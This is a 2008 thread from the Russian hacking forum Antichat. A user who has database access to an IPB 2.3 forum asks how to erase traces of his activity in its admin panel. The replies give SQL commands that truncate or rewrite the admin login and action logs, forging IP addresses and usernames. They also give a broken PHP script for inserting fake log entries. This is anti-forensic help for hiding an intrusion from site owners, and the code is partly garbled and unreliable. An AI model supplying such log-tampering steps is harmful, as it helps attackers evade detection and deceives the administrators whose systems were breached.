HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Убрать следы пребывания в админке. (ipb 2.3.*)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Убрать следы пребывания в админке. (ipb 2.3.*)
  #1  
Старый 25.05.2008, 00:06
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию Убрать следы пребывания в админке. (ipb 2.3.*)
Сосбно сабж. При заходе в админку любому админу сразу справа видно, что делали другие админы.
+есть лог кто, когда и под каким IP заходил в админку.
Надо все это почистить.
п.с. доступ к БД (не из админки) есть...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.05.2008, 02:54
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
С нами: 10304966

Репутация: 5170
По умолчанию
ibf_admin_login_logs
ibf_admin_logs
PHP код:
UPDATE `ibf_admin_login_logsSET `admin_ip_address` = "1.2.3.4" 
PHP код:
TRUNCATE TABLE `ibf_admin_login_logs
PHP код:
UPDATE `ibf_admin_login_logsSET `admin_username`="niggaz makes you cry" WHERE `admin_username`="Nek1t" 
PHP код:
UPDATE `ibf_admin_login_logsSET `admin_ip_address`="" WHERE `admin_ip_address`="TvoiIP" 
Последний раз редактировалось ettee; 25.05.2008 в 15:50..
 
Ответить с цитированием

  #3  
Старый 25.05.2008, 10:08
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию
Спасибо, но это удалит только логи захода в админку.
А как быть с тем что сбоку в админке видно типа:
Цитата:
Admin изменил настройки форума
Admin удалил шаблон ***
и т.д.
Т.е. все действия записываются.
 
Ответить с цитированием

  #4  
Старый 25.05.2008, 10:45
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
С нами: 9499716

Репутация: 135
По умолчанию
За это отвечает таблица ibf_admin_logs
PHP код:
UPDATE `ibf_admin_logsSET `note` = `null`  WERE `member_id` = `ИД_Учётки
 
Ответить с цитированием

  #5  
Старый 25.05.2008, 11:02
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
С нами: 9499716

Репутация: 135
По умолчанию
составил сценарий на скорую руку который чистит следы пребывания в админке IPB .
PHP код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>Untitled Document</title>
<style type="text/css">
<!--
body {color: #EAFFC3;background-color:#615e5f;}
a:hover {color:#CC0033;}
a{color:#148044;text-decoration:none;}
a.pages{color:#FFFFFF;}
-->
</style></head>
<form name="addnews" action="" method="post">
<table border=1>
<tr>
    <td>admin_username:<input name="admin_username" type="text" value=""></td>
    <td>admin_ip_address:<input name="admin_ip_address" type="text" value=""></td>
    <td>note:<input name="date" type="note" value=""></td>
</tr>
<tr><td colspan=3>new info:<br/><textarea name="note" rows=5 cols=71 wrap="off"></textarea></td></tr>
</table>
<input type="submit" value="Send">
</form>
<?
//(C) WEB-DEFENCE.RU
//
include('config.php');// НЕ забудь сменить на путь до конфига.
if(empty($_POST['admin_username']) || empty($_POST['admin_ip_address']) || empty($_POST['note']) ||))
{
    echo 'Some of fields are empty!';
}
else
{
    if(!preg_match("/^\S+$/"$_POST['admin_username']))
    {
        echo 'Error with format of "admin_username"!'."\n";
    }
    elseif(!preg_match("/\S+/"$_POST['admin_ip_address']))
    {
        echo 'Error with format of "note"!'."\n";
    }
    else
    {
        $_POST['admin_username'] = htmlspecialchars($_POST['admin_username']);
        $_POST['title'] = htmlspecialchars($_POST['title']);
        $_POST['smalltext'] = htmlspecialchars($_POST['note']);
        $zc=mysql_query("select * from ibf_admin_login_logs");
        $zc=mysql_num_rows($zc);
        $myreq "INSERT INTO ibf_admin_login_logs (admin_username, admin_ip_address, note, ) VALUES($zc, '$_POST[admin_username]', '$_POST[note]')"//NOW()
        if(@mysql_query($myreq))
        {
            echo 'Added...'."\n";
            echo 'Title: '.$_POST['admin_username']."<br/>\n";
            echo 'Small news: '.$_POST['admin_ip_address']."<br/>\n";
            echo 'Full news: '.$_POST['note']."<br/>\n";
        }
        else
        {
            echo 'Can\'t add'."\n";
        }
    }
}
?>
 
Ответить с цитированием

  #6  
Старый 25.05.2008, 15:18
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию
КВР
Спасиб
Насчет UPDATE `ibf_admin_logs` SET `note` = `null` WERE `member_id` = `ИД_Учётки` - ИМХО палевно.
Целая таблица в БД занулилась! Повод для того чтобы поискать взломщика

Насчет скрипта. Эмм.... Я так понимаю скрипт забивает везде одни и те же значения в таблицу с логами? (PHP учу еще пока...)

Я, к примеру, если замечаю что что-то изменилось в моей админке начинаю страшно параноить и искать залитые шеллы >:]
 
Ответить с цитированием

  #7  
Старый 25.05.2008, 15:26
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
С нами: 9499716

Репутация: 135
По умолчанию
Nek1t, не таблица а поле note в котором хранятся все записи.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ? *Crimson* Уязвимости CMS / форумов 8 04.01.2006 22:10
Есть доступ к админке форума Ipb 1.3, проблемма: залить шелл. rent0n Уязвимости CMS / форумов 14 04.01.2006 03:07
Как скачать в админке IPB базу данных? hesher Уязвимости CMS / форумов 7 31.08.2005 20:35
Как залить шелл в Ipb, имея полноценный доступ к админке? chip Уязвимости CMS / форумов 19 04.04.2005 11:19
Есть доступ к админке в IPB. Как можно просмотреть хэши? chip Уязвимости CMS / форумов 26 17.03.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.